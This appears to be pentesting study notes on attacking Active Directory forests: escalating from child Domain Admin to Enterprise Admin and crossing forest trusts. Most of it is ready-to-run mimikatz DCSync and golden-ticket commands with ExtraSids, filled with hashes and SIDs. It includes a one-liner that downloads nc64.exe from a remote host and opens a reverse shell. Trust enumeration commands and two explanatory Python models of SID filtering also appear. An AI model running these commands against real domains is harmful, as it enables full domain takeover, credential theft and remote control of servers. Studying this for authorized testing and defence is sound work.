Forest

A forest is one or more domains sharing a schema and global catalog. Parent-child trusts are two-way and transitive (a chain of bi-directional links), so every domain in the forest implicitly trusts every other. Enterprise Admins (RID 519) exists only in the forest root domain and is placed in the Administrators group of every domain in the forest, so it is effectively full admin everywhere.

In the context of an Active Directory forest, the goal is to escalate from Domain Admin of one (child) domain to Enterprise Admin. The most direct way is to compromise the root domain and obtain Enterprise Admins membership.

Pre-requisite: at least Domain Admin (or DC local admin / replication rights) in the compromised child domain, so we can DCSync the child's krbtgt hash and forge a golden ticket with it.

DA to Enterprise Admin
#obtain current compromised child domain krbtgt hash
lsadump::dcsync /domain:prod.corp1.com /user:prod\krbtgt

#query current domain SID and parent/root domain SID
Get-DomainSID -Domain prod.corp1.com
Get-DomainSid -Domain corp1.com

#domain = current domain
#sid = current domain sid
#krbtgt = current domain krbtgt hash NTLM
#sids = root domain sid + "-519" (Enterprise Admins RID, only meaningful in the root domain)
kerberos::golden /user:h4x /domain:prod.corp1.com /sid:S-1-5-21-3776646582-2086779273-4091361643 /krbtgt:4b6af2bf64714682eeef64f516a08949 /sids:S-1-5-21-1095350385-1831131555-2412080359-519 /ptt
#golden ticket injected; the ExtraSids field claims Enterprise Admins membership
#when we request a service ticket for a resource in the parent domain, the child DC issues an inter-realm referral TGT encrypted with the trust key and copies the ExtraSids into it; there is no SID filtering inside a forest, so the parent DC accepts the 519 SID and treats us as a legitimate Enterprise Admin
#verify: admin share on the root DC, then code execution
dir \\rdc02.comply.com\admin$
psexec \\dc01 cmd

invoke-command -computername rdc02.comply.com -scriptblock {iwr -uri http://192.168.X.Y/nc64.exe -o c:\windows\tasks\nc64.exe; c:\windows\tasks\nc64.exe 192.168.X.Y 443 -e cmd.exe}

The security boundary is the forest, not the domain: within a forest no real boundary exists between domains; a boundary only exists between forests (and even that can be weakened, see below).

Without DA in the child domain, a host with unconstrained delegation in the child can still be used against the root: coerce the root DC to authenticate to it (printer bug / SpoolSample), capture the root DC's TGT, and use it to DCSync the root domain.

compromise other forest
#pre-requisite: SID history enabled on the trust by the target (trusting) side. This is what an admin of corp2.com would have run; as attacker we only check for the resulting TREAT_AS_EXTERNAL flag
netdom trust corp2.com /d:corp1.com /enablesidhistory:yes
#syntax: netdom trust <trusting domain = target corp2.com> /d:<trusted domain = compromised corp1.com>

#SourceName: target (trusting) domain; TargetName: currently compromised (trusted) domain
Get-DomainTrust -Domain corp2.com
#TrustAttributes : *TREAT_AS_EXTERNAL*,FOREST_TRANSITIVE

#enumerate custom groups in the target domain whose RID (last component of the SID) is > 1000. SID filtering on a forest trust drops any SID with RID < 1000 even with SID history enabled, so built-in groups like DA (512) / EA (519) cannot be injected; a custom domain local group nested in Administrators works
Get-DomainGroupMember -Identity "Administrators" -Domain corp2.com
#GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=corp2,DC=com
#MemberSID               : S-1-5-21-4182647938-3943167060-1815963754-1106

lsadump::dcsync /domain:corp1.com /user:corp1\krbtgt
Get-DomainSID -domain corp1.com
Get-DomainSID -domain corp2.com

#forge a golden ticket in the compromised forest (corp1.com) carrying the RID > 1000 corp2.com group SID as an extra SID
kerberos::golden /user:h4x /domain:corp1.com /sid:S-1-5-21-1095350385-1831131555-2412080359 /krbtgt:22722f2e5074c2f03938f6ba2de5ae5c /sids:S-1-5-21-4182647938-3943167060-1815963754-1106 /ptt
#Extra SIDs: S-1-5-21-4182647938-3943167060-1815963754-1106 ;
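Why the 519 SID works on the parent-child hop but a RID > 1000 group is needed across the forest trust comes down to SID filtering. The following added example (not part of the original notes) is a simplified model of that filtering run over the two golden-ticket scenarios on this page; the domain SIDs are the ones above, the flag values are the trustAttributes bits from MS-ADTS, and the rules are an assumption that covers the default forest trust, the SID-history-enabled (TREAT_AS_EXTERNAL) trust and a quarantined trust.

```python
"""Simplified SID filtering model for forged-ticket ExtraSids (added illustration)."""
import re

# trustAttributes bits (MS-ADTS)
QUARANTINED_DOMAIN = 0x04   # /quarantine:yes, strict SID filtering
FOREST_TRANSITIVE = 0x08
WITHIN_FOREST = 0x20
TREAT_AS_EXTERNAL = 0x40    # set by netdom trust ... /enablesidhistory:yes

# domain SIDs used on this page
PROD_SID = "S-1-5-21-3776646582-2086779273-4091361643"    # prod.corp1.com (child)
CORP1_SID = "S-1-5-21-1095350385-1831131555-2412080359"   # corp1.com (forest root)
CORP2_SID = "S-1-5-21-4182647938-3943167060-1815963754"   # corp2.com (other forest)

_DOMAIN_SID = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Split 'S-1-5-21-x-y-z-RID' into (domain_sid, rid); non-domain SIDs give rid=None."""
    m = _DOMAIN_SID.match(sid)
    return (m.group(1), int(m.group(2))) if m else (sid, None)


def filter_extra_sids(extra_sids, inbound_trust_attributes, trusted_forest_domains):
    """Return the ExtraSids the receiving domain keeps from a ticket that arrived
    over the trust described by inbound_trust_attributes (as seen from the receiver).
    trusted_forest_domains: domain SIDs of the forest the ticket came from.
    Assumed (simplified) rules:
      WITHIN_FOREST           -> nothing is filtered
      any cross-forest trust  -> RID < 1000 (built-in such as 512, 519) dropped
      QUARANTINED_DOMAIN      -> only the trusted domains' own SIDs pass
      TREAT_AS_EXTERNAL       -> foreign-domain SIDs (e.g. the receiver's own) pass
      plain FOREST_TRANSITIVE -> only the trusted forest's own SIDs pass
    """
    kept = []
    for sid in extra_sids:
        domain_sid, rid = split_sid(sid)
        if inbound_trust_attributes & WITHIN_FOREST:
            kept.append(sid)
            continue
        if rid is None or rid < 1000:
            continue
        if inbound_trust_attributes & QUARANTINED_DOMAIN:
            if domain_sid in trusted_forest_domains:
                kept.append(sid)
        elif inbound_trust_attributes & TREAT_AS_EXTERNAL or domain_sid in trusted_forest_domains:
            kept.append(sid)
    return kept


def page_scenarios():
    """The attacks on this page, run through the model."""
    ea_sid = CORP1_SID + "-519"          # Enterprise Admins, lives in the root domain
    corp2_group = CORP2_SID + "-1106"    # custom corp2.com group with RID > 1000
    corp1_forest = {PROD_SID, CORP1_SID}
    return {
        # child -> root: forged in prod.corp1.com, consumed by corp1.com inside the forest
        "child_to_root_EA": filter_extra_sids([ea_sid], WITHIN_FOREST, corp1_forest),
        # corp1.com -> corp2.com over a default forest trust: nothing useful survives
        "cross_forest_default": filter_extra_sids(
            [ea_sid, corp2_group], FOREST_TRANSITIVE, corp1_forest),
        # corp1.com -> corp2.com after /enablesidhistory:yes: RID 1106 survives, 512 does not
        "cross_forest_sidhistory": filter_extra_sids(
            [CORP2_SID + "-512", corp2_group], FOREST_TRANSITIVE | TREAT_AS_EXTERNAL, corp1_forest),
    }


if __name__ == "__main__":
    for name, kept in page_scenarios().items():
        print(f"{name}: kept {kept}")
```

Reading the output: only the intra-forest case keeps the 519 SID, the default forest trust keeps neither SID, and the SID-history-enabled trust keeps the RID 1106 group while dropping the built-in 512, which is exactly the constraint behind the Get-DomainGroupMember enumeration above.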

SQL Server linked servers configured across domains or forests are another pivot path that does not depend on Kerberos trust filtering at all.

A forest is only as strong as its least secure domain and even the security boundary imposed by forest trust can be broken in some instances.

Enumeration

Domain Trusts

from any domain-joined client
nltest /trusted_domains
List of domain trusts:
    0: CORP1 corp1.com (NT 5)   ( Attr: withinforest )
    1: PROD prod.corp1.com (NT 5) (Forest: 0)  (Native)
The command completed successfully
alternatives
#.net method
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

SourceName     TargetName   TrustType TrustDirection
----------     ----------   --------- --------------
prod.corp1.com corp1.com  ParentChild  Bidirectional

#PowerView via the Win32 API (DsEnumerateDomainTrusts); add -NET to use the .NET method instead
Get-DomainTrust -API

SourceName        : PROD.CORP1.COM
TargetName        : corp1.com
TargetNetbiosName : CORP1
Flags             : IN_FOREST, DIRECT_OUTBOUND, TREE_ROOT, DIRECT_INBOUND

#if corp1.com not root, continue enum
Get-DomainTrust -Domain corp1.com 

#default PowerView method: LDAP query of the Trusted Domain Objects (TDOs) that are created under CN=System for each trust
Get-DomainTrust
#similar to .net method output
Get-ForestDomain
Invoke-MapDomainTrust | select SourceName,TargetName,TrustDirection
Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup" -Domain treesss.corp.com
Invoke-BloodHound -CollectionMethod Trusts -SearchForest

Users, Groups, Services in trusted domains

Get-DomainUser -Domain corp1.com
Get-DomainGroup -Domain corp1.com
#Enterprise Admins only exists in the forest root, so query it there
Get-DomainGroupMember "Enterprise Admins" -Domain corp1.com

Group membership can cross the trust: a user in prod.corp1.com may be a member of a group in corp2.com.

#enumerate groups in a trusted forest or domain that contain members from other domains
Get-DomainForeignGroupMember -Domain corp2.com

ConvertFrom-SID {MemberName SID}
#reveals that user x from our current domain is a member of myGroup2 in corp2.com

Depending on the rights granted to myGroup2, compromising user x in our current domain could give us direct access to corp2.com without touching the trust itself.

Forest Trusts

([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

TopLevelNames            : {corp2.com}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {corp2.com}
SourceName               : corp1.com
TargetName               : corp2.com
TrustType                : Forest
TrustDirection           : Bidirectional
alternative
#powerview
Get-DomainTrust -Domain corp1.com

SourceName      : corp1.com
TargetName      : prod.corp1.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 4/2/2020 2:08:22 PM
WhenChanged     : 4/2/2020 2:08:22 PM

SourceName      : corp1.com
TargetName      : corp2.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 4/2/2020 7:05:54 PM
WhenChanged     : 4/17/2020 9:53:21 PM

#automate enum all trusts
Get-DomainTrustMapping
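The TrustAttributes / TrustDirection / TrustType strings PowerView prints are decoded from integer attributes on the TDO. The following added example (not from the original notes) decodes those values the same way and maps the trusts, flagging the ones where a forged ticket's SID history would be honoured. The TDO records are constructed to match the trusts shown on this page; the bit values are from MS-ADTS and PowerView's enum names, and the abuse flag is a conservative assumption that only marks the two cases these notes demonstrate (within forest, or forest trust with TREAT_AS_EXTERNAL and no quarantine).

```python
"""Decode TDO trust attributes and map trusts (added illustration)."""

# trustAttributes bits with PowerView's names
TRUST_ATTRIBUTES = {
    0x01: "NON_TRANSITIVE",
    0x02: "UPLEVEL_ONLY",
    0x04: "FILTER_SIDS",          # QUARANTINED_DOMAIN in MS-ADTS
    0x08: "FOREST_TRANSITIVE",
    0x10: "CROSS_ORGANIZATION",
    0x20: "WITHIN_FOREST",
    0x40: "TREAT_AS_EXTERNAL",
    0x80: "USES_RC4_ENCRYPTION",
}
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}
TRUST_TYPE = {1: "WINDOWS_NON_ACTIVE_DIRECTORY", 2: "WINDOWS_ACTIVE_DIRECTORY", 3: "MIT"}

# constructed TDO records matching the trusts on this page
SAMPLE_TDOS = [
    # queried in corp1.com
    {"source": "corp1.com", "name": "prod.corp1.com", "trustType": 2, "trustAttributes": 0x20, "trustDirection": 3},
    {"source": "corp1.com", "name": "corp2.com", "trustType": 2, "trustAttributes": 0x08, "trustDirection": 3},
    # queried in corp2.com after its admin ran netdom ... /enablesidhistory:yes
    {"source": "corp2.com", "name": "corp1.com", "trustType": 2, "trustAttributes": 0x48, "trustDirection": 3},
]


def decode_flags(value, table):
    """Expand a bitmask into the sorted list of set flag names."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def decode_tdo(tdo):
    """Turn one raw TDO record into the fields PowerView's Get-DomainTrust shows."""
    return {
        "SourceName": tdo["source"],
        "TargetName": tdo["name"],
        "TrustType": TRUST_TYPE.get(tdo["trustType"], str(tdo["trustType"])),
        "TrustAttributes": decode_flags(tdo["trustAttributes"], TRUST_ATTRIBUTES),
        "TrustDirection": TRUST_DIRECTION.get(tdo["trustDirection"], "Unknown"),
    }


def sid_history_abusable(attrs):
    """Conservative assumption: ExtraSids with RID >= 1000 are honoured on an
    intra-forest trust, or on a forest trust with SID history enabled and no quarantine."""
    if "WITHIN_FOREST" in attrs:
        return True
    if "FILTER_SIDS" in attrs:
        return False
    return "TREAT_AS_EXTERNAL" in attrs


def map_trusts(tdos):
    """One row per trust, like Invoke-MapDomainTrust, plus the abuse flag:
    (SourceName, TargetName, TrustDirection, TrustAttributes, sid_history_abusable)."""
    rows = []
    for tdo in tdos:
        d = decode_tdo(tdo)
        rows.append((d["SourceName"], d["TargetName"], d["TrustDirection"],
                     ",".join(d["TrustAttributes"]), sid_history_abusable(d["TrustAttributes"])))
    return rows


if __name__ == "__main__":
    for row in map_trusts(SAMPLE_TDOS):
        print(" | ".join(str(c) for c in row))
```

The third row (corp2.com's inbound trust from corp1.com, attributes 0x48) decodes to TREAT_AS_EXTERNAL,FOREST_TRANSITIVE, which is the condition checked with Get-DomainTrust -Domain corp2.com in the cross-forest section above.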

We could also use the BloodHound and SharpHound ingestors to perform full trust mapping.

Also search for accounts with the same username in both forests: they may belong to the same employee, and if so there is a chance they share a password.
